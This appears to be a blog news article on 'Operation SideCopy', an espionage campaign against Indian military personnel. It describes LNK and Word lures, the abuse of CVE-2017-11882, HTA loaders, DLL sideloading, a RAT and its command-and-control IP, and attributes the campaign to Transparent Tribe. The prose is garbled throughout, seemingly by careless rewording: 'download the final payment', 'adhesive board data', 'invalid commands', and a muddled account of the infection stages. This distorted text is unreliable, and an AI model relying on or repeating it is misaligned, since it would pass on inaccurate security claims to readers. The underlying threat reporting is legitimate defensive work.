Cybersecurity investigators have found new evidence of an ongoing cyberespionage campaign against Indian defense units and military personnel at least since 2019 with the aim of stealing sensitive information.
Named the "Operation SideCopy" of the Indian company Quick Heal, the attack was aimed at the main threat team (APT) that managed to stay under the radar by "copying" the tactics of other threatening actors like SideWinder.
Exploiting the Microsoft Equation Editor error
The start of the campaign is an embedded email attachment - either with a ZIP file containing an LNK file or a Microsoft Word document - that triggers a series of infections through a series of steps to download the final payment.
In addition to identifying three different chains of infection, it is noteworthy that one of them used a template injection with a Microsoft Equation Editor error (CVE-2017-11882), a 20-year-old memory corruption problem at Microsoft Office, which, when used successfully, allows attackers to use remote code on a compromised machine. even without user communication.
Microsoft resolved the issue with an article released in November 2017.
As is often the case with such malspam campaigns, the attack relies on social engineering to enable the user to open a Word document that seems to be a true claim to the Indian government’s defense policy.
In addition, LNK files have double extensions ("Defense-Production-Policy-2020.docx.lnk") and come with text icons, thus tricking the unsuspecting victim into opening the file.
Once opened, LNK files misuse "mshta.exe" to create malicious HTAs (short for Microsoft HTML Applications files) hosted on fraudulent websites, and HTA files are created using an open source payload generator called CACTUSTORCH.
Various Malware Delivery Process
HTA's first-class file includes a fraudulent docket and a malicious NET module that removes this document and downloads HTA's second-phase file, which is responsible for the presence of popular antivirus solutions before copying Microsoft's data and returning the application ("credwiz.exe") to a separate folder on the victim's machine and modify the register to enable the copying done at all times in the beginning.
As a result, when this file is created, it not only uploads the nasty file "DUser.dll", but also launches the RAT module "winms.exe," both of which are found in section 2 HTA.
"The DUser.dll will begin communicating with this IP address 173.212.224.110 'above the TCP 6102 port," the researchers said.
"If connected successfully, it will continue [...] and perform various tasks based on the command found in C2. For example, if C2 sends 0, then collects Computer Name, Username, OS version etc. and then sends it back in C2. "
Referring to the level of code sharing shared by RAT with Allakore Remote, open source access software recorded in Delphi, the Quick Heal's Seqrite team noted that Trojan used the Allakore's RFB (remote frame buffer) protocol to enter data into infected systems.
Possible Links to Transparent Tribe APT
In addition, it is said that there are a few attack chains that discard RAT that was not previously visible. (Called "Crimson RAT" by Kaspersky investigators) comes equipped with a wide range of capabilities, including access files, adhesive board data, execution procedures, and issuing invalid commands.
Although the modus operandi for compiling DLL files shared similarly with the SideWinder team, APT's high reliance on open toolkits and a completely different C2 infrastructure led researchers to reasonably conclude that the threat character is native to Pakistan - particularly the Transparent Tribe Group, recently linked to several attacks on soldiers and Indian government personnel.
“Therefore, we suspect that the actor performing this work is a subgroup (or part) of the Transparent-Tribe APT group and simply impersonating TTP some of the actors who threaten to mislead the security community,” H Quick Heal said.
Comments
Post a Comment